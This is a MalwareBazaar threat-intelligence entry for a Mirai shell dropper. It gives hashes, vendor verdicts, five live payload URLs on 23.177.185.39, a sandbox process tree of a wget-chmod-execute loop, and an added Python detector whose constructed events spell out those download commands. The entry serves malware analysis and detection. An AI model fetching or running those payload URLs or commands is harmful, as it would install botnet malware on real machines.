MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 5



SHA256 hash: 838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5
SHA3-384 hash: 98a5b719e5827926d7f56c1810fcb47dcb0a297b4640044e5b2bcf1ef80165350392bf78379cb9ec58bd7e58d070a635
SHA1 hash: 0f4bc7b0d9ffd934b30483b93a3dff8ebba61e32
MD5 hash: 6c2bab0e80979137ab1df9a37e24c359
humanhash: steak-eighteen-oklahoma-yankee
File name: av.sh
Signature Mirai
File size: 1'125 bytes
First seen: 2025-10-21 15:46:29 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep 24:xoWBGhBh9Mk8QoWDp/Vt+/I/V78/7bXszlHEni8atkk0:xoGGhL8QoWZVt+wV78/7TsztEnBat/0
TLSH T1D221BE5AE441A3545D92594C71CBC62DF07BC3ED29C52AD9FC5D2E68F6CC848F032B25
Magika shell
Reporter abuse_ch
Tags: sh
Payload URLs referenced by this sample (each row: URL | Malware sample (SHA256 hash) | Signature | Tags):

http://23.177.185.39/arm4 | 9537740259e5cdb297a1986493143741babec7e71bc6e339e06c3f87c469e93e | Mirai | elf gafgyt mirai ua-wget
http://23.177.185.39/arm5 | b5f97c4c0ff408de365da6735bf940d1a6a7f7465be68509db8e313f3dcf174f | Mirai | elf gafgyt mirai ua-wget
http://23.177.185.39/arm7 | ffe536b3d11dd297b8155ecf55695ef88518cc6e35976efed155b6328444bfb5 | Mirai | elf mirai ua-wget
http://23.177.185.39/mips | 2cae01a9c5ccb06c91d94ba45a9aaec9f804f60f9bf86cdf97daf5ceacae8f4f | Mirai | 32-bit elf gafgyt mirai Mozi
http://23.177.185.39/mpsl | 9b9764585122f6e0d842fb301963fed0cb6cba5a12740fec2c660d1f636bafd5 | Mirai | elf gafgyt mirai ua-wget

Intelligence


File Origin
# of uploads :
1
# of downloads :
48
Origin country :
DE
Vendor Threat Intelligence
Verdict:
Malicious
File Type:
unix shell
First seen:
2025-10-21T13:10:00Z UTC
Last seen:
2025-10-22T10:13:00Z UTC
Hits:
~10
Status:
terminated
Behavior Graph:
Process tree recovered from the sandbox behaviour graph (the graph image itself is not reproduced here):

/usr/bin/sudo (pid 2514)
  execve -> /tmp/sample.bin (pid 2520)
    The script runs the same four-step cycle five times, once per payload:
      execve -> /usr/bin/rm      (pids 2539, 2682, 2789, 2884, 2991)
      execve -> /usr/bin/wget    (pids 2541, 2684, 2790, 2886, 2992; net, send-data, write-file; each sends 132 B to 23.177.185.39:80)
      execve -> /usr/bin/chmod   (pids 2677, 2784, 2878, 2985, 3101)
      clone  -> /usr/bin/dash    (pids 2679, 2785, 2880, 2986, 3102)
    and finally:
      execve -> /usr/bin/busybox (pid 3105)

The only network endpoint contacted is 23.177.185.39:80, the host that serves the five architecture-specific ELF payloads listed in the IOC table above.
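The process tree above is the standard multi-architecture dropper loop: one shell parent fetches a payload with wget, marks it executable, runs it through a sub-shell, deletes it and moves on to the next architecture. The following is an added example, not code from MalwareBazaar or from the sample: a small Python detector that walks process events, flags every wget that is followed by chmod and an exec among its siblings, and maps the fetched URLs back to this entry's URL/SHA256 table. The EVENTS list is constructed to mirror the behaviour graph (parent pid 2520 and the 23.177.185.39:80 endpoint come from the page; child pids and command lines are assumed), and DROPPER_IOCS is copied from the IOC table on this page.

```python
"""Flag a Mirai-style multi-arch dropper loop (wget -> chmod -> exec -> rm)
in a stream of process events and tie the fetched URLs to known hashes.

Added example for this MalwareBazaar entry; not MalwareBazaar's or the
sample's own code. EVENTS is CONSTRUCTED to mirror the behaviour graph on
the page (parent pid 2520 and 23.177.185.39:80 are from the page; child
pids and command lines are assumed). DROPPER_IOCS is the entry's IOC table.
"""
import re
from collections import defaultdict
from posixpath import basename
from typing import NamedTuple, Optional

# URL -> SHA256 of the payload, copied from the IOC table of this entry.
DROPPER_IOCS = {
    "http://23.177.185.39/arm4": "9537740259e5cdb297a1986493143741babec7e71bc6e339e06c3f87c469e93e",
    "http://23.177.185.39/arm5": "b5f97c4c0ff408de365da6735bf940d1a6a7f7465be68509db8e313f3dcf174f",
    "http://23.177.185.39/arm7": "ffe536b3d11dd297b8155ecf55695ef88518cc6e35976efed155b6328444bfb5",
    "http://23.177.185.39/mips": "2cae01a9c5ccb06c91d94ba45a9aaec9f804f60f9bf86cdf97daf5ceacae8f4f",
    "http://23.177.185.39/mpsl": "9b9764585122f6e0d842fb301963fed0cb6cba5a12740fec2c660d1f636bafd5",
}


class Event(NamedTuple):
    ppid: int
    pid: int
    image: str
    cmdline: str
    net_dst: Optional[str]  # "ip:port" if the process sent data, else None


def _cycle(ppid: int, pid0: int, arch: str):
    """One constructed rm -> wget -> chmod -> dash cycle under parent ppid."""
    url = f"http://23.177.185.39/{arch}"
    return [
        Event(ppid, pid0, "/usr/bin/rm", f"rm -f {arch}", None),
        Event(ppid, pid0 + 1, "/usr/bin/wget", f"wget {url}", "23.177.185.39:80"),
        Event(ppid, pid0 + 2, "/usr/bin/chmod", f"chmod +x {arch}", None),
        Event(ppid, pid0 + 3, "/usr/bin/dash", f"sh -c ./{arch}", None),
    ]


# Constructed event log: sudo -> /tmp/sample.bin, five cycles, then busybox.
EVENTS = [Event(2514, 2520, "/tmp/sample.bin", "/tmp/sample.bin", None)]
for _start, _arch in ((2539, "arm4"), (2682, "arm5"), (2789, "arm7"),
                      (2884, "mips"), (2991, "mpsl")):
    EVENTS += _cycle(2520, _start, _arch)
EVENTS.append(Event(2520, 3105, "/usr/bin/busybox", "busybox", None))

URL_RE = re.compile(r"https?://\S+")
EXEC_IMAGES = {"dash", "sh", "bash", "ash", "busybox"}


def find_dropper_cycles(events, window: int = 3):
    """Return (ppid, url, net_dst) for every wget with outbound traffic that is
    followed, within `window` sibling events, by chmod and then a shell exec."""
    siblings = defaultdict(list)
    for ev in events:
        siblings[ev.ppid].append(ev)
    found = []
    for ppid, kids in siblings.items():
        for i, ev in enumerate(kids):
            if basename(ev.image) != "wget" or not ev.net_dst:
                continue
            chmod_seen = False
            for nxt in kids[i + 1 : i + 1 + window]:
                name = basename(nxt.image)
                if name == "chmod":
                    chmod_seen = True
                elif chmod_seen and name in EXEC_IMAGES:
                    m = URL_RE.search(ev.cmdline)
                    found.append((ppid, m.group(0) if m else None, ev.net_dst))
                    break
    return found


def triage(events, iocs=DROPPER_IOCS):
    """Summarise the cycles, resolve fetched URLs to known payload hashes and
    list download endpoints so the result can be pivoted to the ELF entries."""
    cycles = find_dropper_cycles(events)
    known = {url: iocs[url] for _, url, _ in cycles if url in iocs}
    unknown = sorted({url for _, url, _ in cycles if url and url not in iocs})
    return {
        "dropper_parents": sorted({p for p, _, _ in cycles}),
        "cycles": len(cycles),
        "known_payloads": known,
        "unknown_urls": unknown,
        "download_endpoints": sorted({d for _, _, d in cycles}),
        "is_multiarch_dropper": len(cycles) >= 2,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(EVENTS), indent=2))
```

The window is deliberately short: a dropper does wget, chmod and exec back to back, while a legitimate wget is rarely followed by chmod and a shell within three sibling events. Unknown URLs in the output are the pivot point when the host starts serving payloads that are not yet in the table.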
Threat name:
Document-HTML.Downloader.Heuristic
Status:
Malicious
First seen:
2025-10-21 15:34:38 UTC
File Type:
Text (Shell)
AV detection:
12 of 24 (50.00%)
Threat level:
  2/5
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Note: the three behaviours reported by this vendor are Windows artefacts (registry writes, the Win32 SetWindowsHookEx API) and cannot be produced by a POSIX shell script; do not use them as indicators for this sample.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: Mirai
File type / SHA256: sh 838fa050c80d7d90e0681a569f79938d883bd9d0852e2f9df0a3f95b830c57d5 (this sample)

Distributed via web download

Comments